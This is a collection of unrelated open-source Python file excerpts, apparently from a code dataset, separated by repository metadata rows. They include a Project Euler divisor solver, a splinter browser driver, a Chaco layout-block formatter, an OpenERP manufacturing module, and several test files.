        # Replace the destination angle with the signed shortest-path delta
        # from the current rotation, clamped to (-180, 180]; from here on
        # update() behaves exactly like RotateBy.
        self.angle = ((ea%360) - (sa%360))
        if self.angle > 180:
            self.angle = -360+self.angle
        if self.angle < -180:
            self.angle = 360+self.angle

    def update(self, t):
        self.target.rotation = (self.start_angle + self.angle * t ) % 360

    def __reversed__(self):
        # NOTE(review): once start() has run, self.angle holds the delta,
        # not the original destination, so reversing an in-progress action
        # acts like a RotateBy in the opposite direction — confirm this is
        # the intended semantics.
        return RotateTo(-self.angle, self.duration)
class Speed( IntervalAction ):
"""
Changes the speed of an action, making it take longer (speed>1)
or less (speed<1)
Example::
# rotates the sprite 180 degrees in 1 secondclockwise
action = Speed( Rotate( 180, 2 ), 2 )
sprite.do( action )
"""
def init(self, other, speed ):
"""Init method.
:Parameters:
`other` : IntervalAction
The action that will be affected
`speed` : float
The speed change. 1 is no change.
2 means twice as fast, takes half the time
0.5 means half as fast, takes double the time
"""
self.other = other
self.speed = speed
self.duration |
arekfu/project_euler | p0012/p0012.py | Python | mit | 839 | 0.008343 | #!/usr/bin/env python3
import math
from collections import Counter
import operator
import functools
# Memoisation cache: n -> Counter mapping prime factor -> multiplicity.
# NOTE: cached Counters are returned by reference; callers must not mutate.
DICT_FACTORS = dict()

def factorize(n):
    """Return the prime factorisation of *n* as a Counter {prime: exponent}.

    Results are memoised in DICT_FACTORS.  factorize(1) returns an empty
    Counter.
    """
    if n in DICT_FACTORS:
        return DICT_FACTORS[n]
    cnt = Counter()
    # BUGFIX: without this guard the trial-division range could reach n
    # itself (e.g. n == 2), recursing into factorize(1) and recording a
    # bogus factor "1" — which doubled n_divisors() for many inputs.
    if n > 1:
        sqrtn = int(math.sqrt(n)) + 1
        for i in range(2, sqrtn + 1):
            if n % i == 0:
                # Record the smallest divisor and recurse on the cofactor.
                cnt[i] += 1
                cnt += factorize(n // i)
                break
        else:
            # No divisor up to sqrt(n): n is prime.
            cnt[n] += 1
    DICT_FACTORS[n] = cnt
    return cnt
def n_divisors(n):
    """Return the number of positive divisors of *n*.

    Uses the classic formula: product of (exponent + 1) over the prime
    factorisation of n.
    """
    factors = factorize(n)
    count = 1
    for exponent in factors.values():
        count *= exponent + 1
    return count
def triangular_number(n):
    """Return the n-th triangular number, i.e. 1 + 2 + ... + n."""
    return (n * (n + 1)) // 2
# Scan triangular numbers (starting arbitrarily from the 100th) until one
# has more than 500 divisors — Project Euler problem 12.
i = 100
while True:
    n = triangular_number(i)
    n_div = n_divisors(n)
    if n_div > 500:
        # Found the answer: print it and stop.
        print(n)
        break
    # Progress trace: triangular number, its index, and its divisor count.
    print('{}, {}: {}'.format(n, i, n_div))
    i = i + 1
|
devenbansod/SWD-Query | splinter/driver/zopetestbrowser.py | Python | gpl-2.0 | 12,097 | 0.001736 | # -*- coding: utf-8 -*-
# Copyright 2012 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import mimetypes
import os
import re
import time

import lxml.html
import mechanize
from lxml.cssselect import CSSSelector
from zope.testbrowser.browser import Browser

from splinter.cookie_manager import CookieManagerAPI
from splinter.driver import DriverAPI, ElementAPI
from splinter.element_list import ElementList
from splinter.exceptions import ElementDoesNotExist
class CookieManager(CookieManagerAPI):
    """Cookie manager backed by a zope.testbrowser cookie mapping."""

    def __init__(self, browser_cookies):
        # browser_cookies is the mutable cookie mapping of the browser.
        self._cookies = browser_cookies

    def add(self, cookies):
        """Add cookies from a dict, or from a list of dicts."""
        if isinstance(cookies, list):
            for cookie in cookies:
                for key, value in cookie.items():
                    self._cookies[key] = value
            return
        for key, value in cookies.items():
            self._cookies[key] = value

    def delete(self, *cookies):
        """Delete the named cookies, or every cookie when none are given."""
        if cookies:
            for cookie in cookies:
                try:
                    del self._cookies[cookie]
                except KeyError:
                    # Deleting a missing cookie is a deliberate no-op.
                    pass
        else:
            self._cookies.clearAll()

    def all(self, verbose=False):
        """Return all cookies as a plain dict (*verbose* kept for API parity)."""
        return dict(self._cookies.items())

    def __getitem__(self, item):
        return self._cookies[item]

    def __eq__(self, other_object):
        if isinstance(other_object, dict):
            return dict(self._cookies) == other_object
        # BUGFIX: previously fell through and returned None for non-dict
        # operands; NotImplemented lets Python try the reflected comparison.
        return NotImplemented
class ZopeTestBrowser(DriverAPI):
driver_name = "zope.testbrowser"
def __init__(self, user_agent=None, wait_time=2):
    # wait_time: default timeout in seconds used by is_text_present()
    # and friends when no explicit wait is passed.
    self.wait_time = wait_time
    mech_browser = self._get_mech_browser(user_agent)
    self._browser = Browser(mech_browser=mech_browser)
    self._cookie_manager = CookieManager(self._browser.cookies)
    # History of URLs recorded by back(), consumed by forward().
    self._last_urls = []
def __enter__(self):
    # Support "with ZopeTestBrowser() as browser:" usage.
    return self

def __exit__(self, exc_type, exc_value, traceback):
    # Nothing to release: this driver holds no external resources.
    pass

def visit(self, url):
    """Open *url* in the wrapped zope.testbrowser browser."""
    self._browser.open(url)

def back(self):
    # Remember the page we are leaving so forward() can return to it.
    self._last_urls.insert(0, self.url)
    self._browser.goBack()

def forward(self):
    # NOTE(review): back() pushes at index 0 while this pops from the
    # end, so after several back() calls forward() replays the *oldest*
    # recorded URL first — confirm that ordering is intended.
    try:
        self.visit(self._last_urls.pop())
    except IndexError:
        # No forward history recorded; silently do nothing.
        pass

def reload(self):
    self._browser.reload()

def quit(self):
    # No browser process to terminate for this driver.
    pass
@property
def htmltree(self):
    # Current page parsed into an lxml element tree.
    return lxml.html.fromstring(self.html.decode('utf-8'))

@property
def title(self):
    return self._browser.title

@property
def html(self):
    # Raw response body of the current page.
    return self._browser.contents

@property
def url(self):
    return self._browser.url
def find_option_by_value(self, value):
    """Find the <option> whose ``value`` attribute equals *value*."""
    html = self.htmltree
    element = html.xpath('//option[@value="%s"]' % value)[0]
    # NOTE(review): the control is resolved via the option's *text*, which
    # assumes option texts are unique on the page — confirm.
    control = self._browser.getControl(element.text)
    return ElementList([ZopeTestBrowserOptionElement(control, self)], find_by="value", query=value)

def find_option_by_text(self, text):
    """Find the <option> whose visible text equals *text*."""
    html = self.htmltree
    element = html.xpath('//option[normalize-space(text())="%s"]' % text)[0]
    control = self._browser.getControl(element.text)
    return ElementList([ZopeTestBrowserOptionElement(control, self)], find_by="text", query=text)
def find_by_css(self, selector):
    # Translate the CSS selector to XPath and reuse the XPath machinery,
    # while reporting the original CSS selector to the caller.
    xpath = CSSSelector(selector).path
    return self.find_by_xpath(xpath, original_find="css", original_selector=selector)
def find_by_xpath(self, xpath, original_find=None, original_selector=None):
    """Find elements by XPath, dispatching links and form controls to
    their specialised finders so the right wrapper class is used."""
    html = self.htmltree
    elements = []
    for xpath_element in html.xpath(xpath):
        if self._element_is_link(xpath_element):
            # Anchors get the link-aware wrapper (covers all matches).
            return self._find_links_by_xpath(xpath)
        elif self._element_is_control(xpath_element):
            # Form controls must be resolved through zope.testbrowser.
            return self.find_by_name(xpath_element.name)
        else:
            elements.append(xpath_element)
    # original_find / original_selector let wrappers such as find_by_css
    # report the selector the user actually wrote.
    find_by = original_find or "xpath"
    query = original_selector or xpath
    return ElementList([ZopeTestBrowserElement(element, self) for element in elements], find_by=find_by, query=query)
def find_by_tag(self, tag):
    return self.find_by_xpath('//%s' % tag, original_find="tag", original_selector=tag)

def find_by_value(self, value):
    return self.find_by_xpath('//*[@value="%s"]' % value, original_find="value", original_selector=value)

def find_by_id(self, id_value):
    # NOTE(review): '[1]' in this XPath applies per nesting level rather
    # than globally; it works in practice because ids should be unique.
    return self.find_by_xpath('//*[@id="%s"][1]' % id_value, original_find="id", original_selector=id_value)
def find_by_name(self, name):
    """Find every control whose ``name`` attribute equals *name*."""
    elements = []
    index = 0
    while True:
        # getControl raises LookupError once the index runs past the
        # last matching control on the page.
        try:
            elements.append(self._browser.getControl(name=name, index=index))
        except LookupError:
            break
        index += 1
    wrapped = [ZopeTestBrowserControlElement(element, self)
               for element in elements]
    return ElementList(wrapped, find_by="name", query=name)
# Link finders: each builds an anchor-element XPath and delegates to the
# shared _find_links_by_xpath helper.
def find_link_by_text(self, text):
    return self._find_links_by_xpath("//a[text()='%s']" % text)

def find_link_by_href(self, href):
    return self._find_links_by_xpath("//a[@href='%s']" % href)

def find_link_by_partial_href(self, partial_href):
    return self._find_links_by_xpath("//a[contains(@href, '%s')]" % partial_href)

def find_link_by_partial_text(self, partial_text):
    return self._find_links_by_xpath("//a[contains(normalize-space(.), '%s')]" % partial_text)
def fill(self, name, value):
    """Set the value of the first control named *name*."""
    self.find_by_name(name=name).first._control.value = value

def fill_form(self, field_values):
    """Fill several controls from a {name: value} mapping, honouring
    each control type's value convention."""
    for name, value in field_values.items():
        element = self.find_by_name(name)
        control = element.first._control
        if control.type == 'checkbox':
            if value:
                # Checking a checkbox means selecting all of its options.
                control.value = control.options
            else:
                control.value = []
        elif control.type == 'radio':
            # Radio groups take a list containing the selected option.
            control.value = [option for option in control.options if option == value]
        elif control.type == 'select':
            control.value = [value]
        else:
            # text, textarea, password, tel
            control.value = value
def choose(self, name, value):
    """Select the radio option with the given *value*."""
    control = self._browser.getControl(name=name)
    control.value = [option for option in control.options if option == value]

def check(self, name):
    # Tick a checkbox by selecting every one of its options.
    control = self._browser.getControl(name=name)
    control.value = control.options

def uncheck(self, name):
    # Clearing the value list unticks the checkbox.
    control = self._browser.getControl(name=name)
    control.value = []
def attach_file(self, name, file_path):
filename = file_path.split('/')[-1]
control = self._browser.getControl(name=name)
content_type, _ = mimetypes.guess_type(file_path)
control.add_file(open(file_path), content_type, filename)
|
def _find_links_by_xpath(self, xpath):
    # Shared helper backing all find_link_by_* methods.
    html = self.htmltree
    links = html.xpath(xpath)
    return ElementList([ZopeTestBrowserLinkElement(link, self) for link in links], find_by="xpath", query=xpath)

def select(self, name, value):
    """Select *value* in the <select> control named *name*."""
    self.find_by_name(name).first._control.value = [value]
def is_text_present(self, text, wait_time=None):
    """Poll the page until *text* appears, up to *wait_time* seconds.

    Falls back to self.wait_time when *wait_time* is falsy (including 0,
    matching the original behaviour).
    """
    wait_time = wait_time or self.wait_time
    end_time = time.time() + wait_time
    # BUGFIX: check at least once — the old pre-test loop could return
    # False without ever looking at the page if the deadline had already
    # passed by the time the loop condition was evaluated.
    while True:
        if self._is_text_present(text):
            return True
        if time.time() >= end_time:
            return False
def _is_text_present(self, text):
    """Single, non-waiting check for *text* in the page body."""
    try:
        body = self.find_by_tag('body').first
        return text in body.text
    except ElementDoesNotExist:
        # This exception will be thrown if the body tag isn't present
        # This has occasionally been observed. Assume that the
        # page isn't fully loaded yet
        return False
def is_text_not_present(self, text, wait_time=None):
wait_time = wait_time or self.wait_time
end_time = time |
google/sample-sql-translator | rfmt/blocks.py | Python | apache-2.0 | 13,911 | 0.006398 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The block language system for the R language formatter."""
from . import base
from . import support
import re
_options = base.Options() # Shorthand for convenient access
class LayoutBlock(object):
  """The abstract class at base of the block hierarchy."""

  def __init__(self, is_breaking=False):
    # If a newline is mandated after this block.
    self.is_breaking = is_breaking
    # See OptLayout method below for use of layout_cache.
    self.layout_cache = {}

  def Parms(self):
    """A dictionary containing the parameters of this block."""
    return {}

  def ReprParms(self):
    """The printed representation of this block's parameters."""
    if not self.Parms(): return ''
    return ('<%s>' % (', '.join('%s=%s' % (key, val.__repr__())
                                for key, val in self.Parms().iteritems())))

  def __repr__(self):
    # Abbreviate the class name to its capitals (e.g. LineBlock -> LB) and
    # append '*' when the block forces a following line break.
    return re.sub('[a-z]', '', self.__class__.__name__ +
                  '*' * self.is_breaking) + self.ReprParms()

  def OptLayout(self, rest_of_line):
    """Retrieve or compute the least-cost (optimum) layout for this block.

    Args:
      rest_of_line: a Solution object representing the text to the right of
        this block.

    Returns:
      A Solution object representing the optimal layout for this block and
      the rest of the line.
    """
    # Deeply-nested choice block may result in the same continuation supplied
    # repeatedly to the same block. Without memoisation, this may result in an
    # exponential blow-up in the layout algorithm.
    if rest_of_line not in self.layout_cache:
      self.layout_cache[rest_of_line] = self.DoOptLayout(rest_of_line)
    return self.layout_cache[rest_of_line]

  def DoOptLayout(self, rest_of_line):
    """Compute the least-cost (optimum) layout for this block.

    Args:
      rest_of_line: a Solution object representing the text to the right of
        this block.

    Returns:
      A Solution object representing the optimal layout for this block and
      the rest of the line.
    """
    # Abstract method.
    pass

  def PrintOn(self, outp):
    """Print the contents of this block with the optimal layout.

    Args:
      outp: a stream on which output is to be printed.
    """
    # None continuation: nothing follows the block on its last line.
    soln = self.OptLayout(None)
    support.Console(outp).PrintLayout(soln.layouts[0])
class TextBlock(LayoutBlock):
  """A block containing a single unbroken string."""

  def __init__(self, text, is_breaking=False):
    super(TextBlock, self).__init__(is_breaking)
    self.text = text

  def __repr__(self):
    return '*' * self.is_breaking + self.text

  def DoOptLayout(self, rest_of_line):
    # The text is laid out verbatim; only the cost function is non-trivial.
    span = len(self.text)
    layout = support.Layout([support.LayoutElement.String(self.text)])
    # The costs associated with the layout of this block may require 1, 2 or 3
    # knots, depending on how the length of the text compares with the two
    # margins (m0 and m1) in _options. Note that we assume
    # _options.m1 >= _options.m0 >= 0, as asserted in base.Options.Check().
    if span >= _options.m1:
      # NOTE(review): "(span - _options.m1) * _options.m1" multiplies the
      # overflow by the *margin* m1 while the sibling branches use the cost
      # coefficients c0/c1 — confirm this is not a typo for _options.c1.
      s = support.Solution([0], [span],
                           [(span - _options.m0) * _options.c0 +
                            (span - _options.m1) * _options.m1],
                           [_options.c0 + _options.c1], [layout])
    elif span >= _options.m0:
      s = support.Solution([0, _options.m1 - span], [span] * 2,
                           [(span - _options.m0) * _options.c0,
                            (_options.m1 - _options.m0) * _options.c0],
                           [_options.c0, _options.c0 + _options.c1],
                           [layout] * 2)
    else:
      s = support.Solution([0, _options.m0 - span, _options.m1 - span],
                           [span] * 3,
                           [0, 0, (_options.m1 - _options.m0) * _options.c0],
                           [0, _options.c0, _options.c0 + _options.c1],
                           [layout] * 3)
    return s.WithRestOfLine(rest_of_line)
class CompositeLayoutBlock(LayoutBlock):
  """The abstract superclass of blocks which contain other blocks (elements).

  Note that we assume at least one element.
  """

  def __init__(self, elements):
    super(CompositeLayoutBlock, self).__init__()
    self.elements = elements
    # Break after this block if its last element requires a break.
    # bool() keeps is_breaking a real boolean even when elements is empty
    # (the old expression left the empty list itself in the attribute).
    self.is_breaking = bool(elements) and elements[-1].is_breaking

  def ReprElements(self):
    """The printed representation of this block's child elements."""
    return '[%s]' % (', '.join(e.__repr__() for e in self.elements))

  def __repr__(self):
    return super(CompositeLayoutBlock, self).__repr__() + self.ReprElements()
class LineBlock(CompositeLayoutBlock):
  """A block that places its elements in a single line."""

  def __init__(self, elements):
    super(LineBlock, self).__init__(elements)

  def DoOptLayout(self, rest_of_line):
    if not self.elements: return rest_of_line
    # Partition the elements into lines: a breaking element forces
    # everything after it onto a new line.
    element_lines = [[]]
    for i, elt in enumerate(self.elements):
      element_lines[-1].append(elt)
      if i < len(self.elements) - 1 and elt.is_breaking:
        element_lines.append([])
    if len(element_lines) > 1:
      element_lines = _options.format_policy.BreakElementLines(element_lines)
    line_solns = []
    for i, ln in enumerate(element_lines):
      # Only the final line faces the provided continuation; earlier lines
      # end in a forced break and therefore see no continuation.
      ln_layout = None if i < len(element_lines) - 1 else rest_of_line
      # Compose right-to-left so each element sees what follows it.
      for elt in ln[::-1]:
        ln_layout = elt.OptLayout(ln_layout)
      line_solns.append(ln_layout)
    soln = support.VSumSolution(line_solns)
    # Charge the standard break cost for each newline introduced here.
    return soln.PlusConst(_options.cb * (len(line_solns) - 1))
def IndentBlock(element, indent=None):
  """Return a block that contains another block, indented by a given amount.

  When *indent* is None, the configured default indent is used.
  """
  if indent is None:
    indent = _options.ind
  prefix = TextBlock(' ' * indent)
  return LineBlock([prefix, element])
class ChoiceBlock(CompositeLayoutBlock):
  """A block which contains alternate layouts of the same content."""
  # Note: All elements of a ChoiceBlock are breaking, if any are.

  def __init__(self, elements):
    super(ChoiceBlock, self).__init__(elements)

  def DoOptLayout(self, rest_of_line):
    # The optimum layout is simply the piecewise minimum over the layouts
    # of all the alternatives.
    candidate_solutions = [element.OptLayout(rest_of_line)
                           for element in self.elements]
    return support.MinSolution(candidate_solutions)
class MultBreakBlock(CompositeLayoutBlock):
  """The abstract superclass of blocks that locally modify line break cost."""

  def __init__(self, elements, break_mult=1):
    super(MultBreakBlock, self).__init__(elements)
    # Multiplier applied to the break cost inside this block.
    self.break_mult = break_mult

  def Parms(self):
    # Copy-and-update instead of concatenating items() lists: equivalent on
    # Python 2 and also correct on Python 3, where items() is a view that
    # does not support '+'.
    parms = dict(super(MultBreakBlock, self).Parms())
    parms['break_mult'] = self.break_mult
    return parms
class StackBlock(MultBreakBlock):
"""A block that arranges its elements vertically, separated by line breaks."""
def __init__(self, elements, break_mult=1):
super(StackBlock, self).__init__(elements, break_mult)
def DoOptLayout(self, rest_of_line):
# The optimum layout for this block arranges the elements vertically. Only
# the final element is composed with the continuation provided---all the
# others see an empty continuation ("None"), since they face the end of
# a line.
if not self.elements: return rest_of_line
soln = support.VSumSolution([e.OptLayout(None)
for e in self.elements[:-1]] +
[self.elements[-1].OptLayout(rest_of_line)])
# Under some odd circumstances involving comments, we may have a degenerate
# solution.
if soln is None:
return rest_of_line
# Add the cost of the line breaks between the elements.
re |
visionegg/visionegg | demo/grating.py | Python | lgpl-2.1 | 1,456 | 0.023352 | #!/usr/bin/env python
"""Sinusoidal grating calculated in realtime."""
############################
#  Import various modules  #
############################

import VisionEgg
VisionEgg.start_default_logging(); VisionEgg.watch_exceptions()

from VisionEgg.Core import *
from VisionEgg.FlowControl import Presentation
from VisionEgg.Gratings import *

#####################################
#  Initialize OpenGL window/screen  #
#####################################

screen = get_default_screen()

######################################
#  Create sinusoidal grating object  #
######################################

# 300x300 px grating centred on the screen, drifting at 1 Hz, tilted 45 deg.
stimulus = SinGrating2D(position = ( screen.size[0]/2.0, screen.size[1]/2.0 ),
                        anchor = 'center',
                        size = ( 300.0 , 300.0 ),
                        spatial_freq = 10.0 / screen.size[0], # units of cycles/pixel
                        temporal_freq_hz = 1.0,
                        orientation = 45.0 )

###############################################################
#  Create viewport - intermediary between stimuli and screen  #
###############################################################

viewport = Viewport( screen=screen, stimuli=[stimulus] )

########################################
#  Create presentation object and go!  #
########################################

# Present the drifting grating for five seconds, then return.
p = Presentation(go_duration=(5.0,'seconds'),viewports=[viewport])
p.go()
|
Elico-Corp/openerp-7.0 | mrp_mo_nopicking/mrp.py | Python | agpl-3.0 | 4,435 | 0.008345 | # -*- coding: utf-8 -*-
# © 2014 Elico Corp (https://www.elico-corp.com)
# Licence AGPL-3.0 or later(http://www.gnu.org/licenses/agpl.html)
import time
from datetime import datetime
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP
from openerp.tools import float_compare
from openerp.tools.translate import _
from openerp import SUPERUSER_ID
from openerp import netsvc
from openerp import tools
class mrp_production(osv.osv):
    # Extends the core manufacturing-order model (OpenERP 7 osv API).
    _inherit = 'mrp.production'

    def _action_compute_lines(self, cr, uid, ids, properties=None, context=None):
        """ Computes bills of material of a product.
        @param properties: List containing dictionaries of properties.
        @return: No. of products.
        """
        if properties is None:
            properties = []
        results = []
        bom_obj = self.pool.get('mrp.bom')
        uom_obj = self.pool.get('product.uom')
        prod_line_obj = self.pool.get('mrp.production.product.line')
        workcenter_line_obj = self.pool.get('mrp.production.workcenter.line')
        for production in self.browse(cr, uid, ids):
            # unlink product_lines (recomputed below from the BoM)
            prod_line_obj.unlink(cr, SUPERUSER_ID, [line.id for line in production.product_lines], context=context)
            # unlink workcenter_lines
            workcenter_line_obj.unlink(cr, SUPERUSER_ID, [line.id for line in production.workcenter_lines], context=context)
            # search BoM structure and route
            bom_point = production.bom_id
            bom_id = production.bom_id.id
            if not bom_point:
                bom_id = bom_obj._bom_find(cr, uid, production.product_id.id, production.product_uom.id, properties)
                if bom_id:
                    bom_point = bom_obj.browse(cr, uid, bom_id)
                    routing_id = bom_point.routing_id.id or False
                    self.write(cr, uid, [production.id], {'bom_id': bom_id, 'routing_id': routing_id})
            # Unlike the stock OpenERP implementation (which raises), a
            # missing BoM is skipped silently here.
            if not bom_id:
                continue
            # get components and workcenter_lines from BoM structure
            factor = uom_obj._compute_qty(cr, uid, production.product_uom.id, production.product_qty, bom_point.product_uom.id)
            res = bom_obj._bom_explode(cr, uid, bom_point, factor / bom_point.product_qty, properties, routing_id=production.routing_id.id)
            results = res[0]  # product_lines
            results2 = res[1]  # workcenter_lines
            # reset product_lines in production order
            for line in results:
                line['production_id'] = production.id
                prod_line_obj.create(cr, uid, line)
            # reset workcenter_lines in production order
            for line in results2:
                line['production_id'] = production.id
                workcenter_line_obj.create(cr, uid, line)
        # Returns the product lines of the *last* processed order.
        return results

    def action_ready(self, cr, uid, ids, context=None):
        """ Changes the production state to Ready and location id of stock move.
        @return: True
        """
        move_obj = self.pool.get('stock.move')
        self.write(cr, uid, ids, {'state': 'ready'})
        for production in self.browse(cr, uid, ids, context=context):
            if not production.bom_id:
                # NOTE(review): the returned move id is unused; the call is
                # kept for its side effect of creating the produce line.
                produce_move_id = self._make_production_produce_line(cr, uid, production, context=context)
        for (production_id, name) in self.name_get(cr, uid, ids):
            production = self.browse(cr, uid, production_id)
            if production.move_prod_id and production.move_prod_id.location_id.id != production.location_dest_id.id:
                # Keep the final product move aligned with the order's
                # destination location.
                move_obj.write(cr, uid, [production.move_prod_id.id],
                               {'location_id': production.location_dest_id.id})
        return True

    def action_produce(self, cr, uid, production_id, production_qty, production_mode, context=None):
        # Orders without a BoM skip picking: push the workflow straight to
        # 'button_produce' before delegating to the standard behaviour.
        production = self.browse(cr, uid, production_id, context=context)
        if not production.bom_id and production.state == 'ready':
            wf_service = netsvc.LocalService("workflow")
            wf_service.trg_validate(uid, 'mrp.production', production_id, 'button_produce', cr)
        return super(mrp_production, self).action_produce(cr, uid, production_id, production_qty, production_mode, context=context)

# Instantiation registers the model with the ORM (legacy OpenERP idiom).
mrp_production()
|
cisco-openstack/tempest | tempest/api/object_storage/test_crossdomain.py | Python | apache-2.0 | 2,264 | 0 | # Copyright (C) 2013 eNovance SAS <licensing@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
| # a copy of the License at
#
# http://www.apache.org/licenses/LICENS | E-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.object_storage import base
from tempest.common import custom_matchers
from tempest.common import utils
from tempest.lib import decorators
class CrossdomainTest(base.BaseObjectTest):
    """Checks Swift's crossdomain middleware (``/crossdomain.xml``)."""

    @classmethod
    def resource_setup(cls):
        super(CrossdomainTest, cls).resource_setup()
        # Expected envelope of the Adobe cross-domain policy document.
        cls.xml_start = '<?xml version="1.0"?>\n' \
                        '<!DOCTYPE cross-domain-policy SYSTEM ' \
                        '"http://www.adobe.com/xml/dtds/cross-domain-policy.' \
                        'dtd" >\n<cross-domain-policy>\n'
        cls.xml_end = "</cross-domain-policy>"

    def setUp(self):
        super(CrossdomainTest, self).setUp()

    @decorators.idempotent_id('d1b8b031-b622-4010-82f9-ff78a9e915c7')
    @utils.requires_ext(extension='crossdomain', service='object')
    def test_get_crossdomain_policy(self):
        # The policy document lives at the service root, outside the
        # account/container URL space, hence the raw request.
        url = self.account_client._get_base_version_url() + "crossdomain.xml"
        resp, body = self.account_client.raw_request(url, "GET")
        self.account_client._error_checker(resp, body)
        body = body.decode()
        self.assertTrue(body.startswith(self.xml_start) and
                        body.endswith(self.xml_end))

        # The target of the request is not any Swift resource. Therefore, the
        # existence of response header is checked without a custom matcher.
        self.assertIn('content-length', resp)
        self.assertIn('content-type', resp)
        self.assertIn('x-trans-id', resp)
        self.assertIn('date', resp)

        # Check only the format of common headers with custom matcher
        self.assertThat(resp, custom_matchers.AreAllWellFormatted())
|
tommy-u/chaco | chaco/tools/tests/better_zoom_test_case.py | Python | bsd-3-clause | 1,537 | 0 | # Copyright (c) 2014, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/l | icenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
""" Tests for the BetterZoom Chaco tool """
import unittest
import numpy
from chaco.api import create_line_plot
from chaco.tools.api import BetterZoom
from enable.testing import EnableTestAssistant
class TestBetterZoomTool(EnableTestAssi | stant, unittest.TestCase):
""" Tests for the BetterZoom Chaco tool """
def setUp(self):
values = numpy.arange(10)
self.plot = create_line_plot((values, values))
self.plot.bounds = [100, 100]
self.plot._window = self.create_mock_window()
self.tool = BetterZoom(component=self.plot)
self.plot.active_tool = self.tool
self.plot.do_layout()
def tearDown(self):
del self.tool
del self.plot
def test_default_position(self):
tool = self.tool
# this doesn't throw an exception
self.send_key(tool, '+')
self.assertEqual(tool.position, (50, 50))
# expected behaviour for a normal zoom in operation
self.assertNotEqual(tool._index_factor, 1.0)
self.assertNotEqual(tool._value_factor, 1.0)
self.assertEqual(len(tool._history), 2)
|
felipeZ/nonAdiabaticCoupling | scripts/hamiltonians/plot_couplings.py | Python | mit | 2,000 | 0 | #! /usr/bin/env python
"""
This programs plots the electronic coupling between two states.
It reads all Ham_*_im files and cache them in a tensor saved on disk.
Usage:
plot_couplings.py -p . -s1 XX -s2 YY -dt 1.0
p = path to the hamiltonian files
s1 = state 1 index
s2 = state 2 index
dt = time step in fs
"""
import numpy as np
import matplotlib.pyplot as plt
import argparse
import glob
import os.path
r2meV = 13605.698 # From Rydeberg to eV
def main(path_output, s1, s2, dt):
# Check if the file with couplings exists
if not os.path.isfile('couplings.npy'):
# Check all the files stored
files_im = glob.glob('Ham_*_im')
# Read the couplings
couplings = np.stack(
np.loadtxt(f'Ham_{f}_im') for f in range(len(files_im)))
# Save the file for fast r | eading afterwards
np.save('couplings', couplings)
else:
couplings = np.load | ('couplings.npy')
ts = np.arange(couplings.shape[0]) * dt
plt.plot(ts, couplings[:, s1, s2] * r2meV)
plt.xlabel('Time (fs)')
plt.ylabel('Energy (meV)')
plt.show()
def read_cmd_line(parser):
"""
Parse Command line options.
"""
args = parser.parse_args()
attributes = ['p', 's1', 's2', 'dt']
return [getattr(args, p) for p in attributes]
if __name__ == "__main__":
msg = "plot_decho -p <path/to/hamiltonians> -s1 <State 1> -s2 <State 2>\
-dt <time step>"
parser = argparse.ArgumentParser(description=msg)
parser.add_argument('-p', required=True,
help='path to the Hamiltonian files in Pyxaid format')
parser.add_argument('-s1', required=True, type=int,
help='Index of the first state')
parser.add_argument('-s2', required=True, type=int,
help='Index of the second state')
parser.add_argument('-dt', type=float, default=1.0,
help='Index of the second state')
main(*read_cmd_line(parser))
|
seanballais/botos | tests/test_admin.py | Python | gpl-3.0 | 95,577 | 0.00135 | # This test is partly based from:
# https://www.argpar.se/posts/programming/testing-django-admin/
from urllib.parse import urljoin
import json
from bs4 import BeautifulSoup
from django import forms
from django.contrib.admin import ACTION_CHECKBOX_NAME
from django.contrib.admin.sites import AdminSite
from django.contrib.contenttypes.models import ContentType
from django.contrib.messages import get_messages
from django.test import (
RequestFactory, TestCase
)
from django.urls import reverse
from core.admin import (
AdminUserAdmin, ElectionAdmin, VoterAdmin, VoterProfileInline, AdminUser,
Voter, AdminCreationForm, VoterCreationForm, CandidateForm,
)
from core.models import (
User, Batch, Section, VoterProfile, UserType, Candidate, CandidateParty,
CandidatePosition, Election, Vote
)
class MockSuperUser:
def has_perm(self, perm):
return True
class AdminLoginViewTest(TestCase):
"""
Tests admin login view.
"""
def test_admin_login_redirects_to_index(self):
response = self.client.get(reverse('admin:login'), follow=True)
self.assertRedirects(response, reverse('index'))
def test_admin_login_with_next_redirects_to_index(self):
response = self.client.get(
reverse('admin:login'),
{
'next': reverse('results')
},
follow=True
)
self.assertRedirects(
response,
'{}?next={}'.format(reverse('index'), reverse('results'))
)
class BatchAdminTest(TestCase):
"""
Tests the Batch admin.
"""
@classmethod
def setUpTestData(cls):
cls._election0 = Election.objects.create(name='Election 0')
cls._election1 = Election.objects.create(name='Election 1')
cls._batch0 = Batch.objects.create(year=0, election=cls._election0)
_batch1 = Batch.objects.create(year=1, election=cls._election1)
_section0 = Section.objects.create(section_name='Section 0')
_section1 = Section.objects.create(section_name='Section 1')
_voted_user0 = User.objects.create(
username='pedro',
type=UserType.VOTER
)
_voted_user0.set_password('pendoko')
_voted_user0.save()
_voted_user1 = User.objects.create(
username='pedro1',
type=UserType.VOTER
)
_voted_user1.set_password('pendoko1')
_voted_user1.save()
VoterProfile.objects.create(
user=_voted_user0,
has_voted=True,
batch=cls._batch0,
section=_section0
)
VoterProfile.objects.create(
user=_voted_user1,
has_voted=True,
batch=_batch1,
section=_section1
)
_party0 = CandidateParty.objects.create(
party_name='Awesome Party 0',
election=cls._election0
)
_party1 = CandidateParty.objects.create(
party_name='Awesome Party 1',
election=cls._election1
)
_position0 = CandidatePosition.objects.create(
position_name='Amazing Position 0',
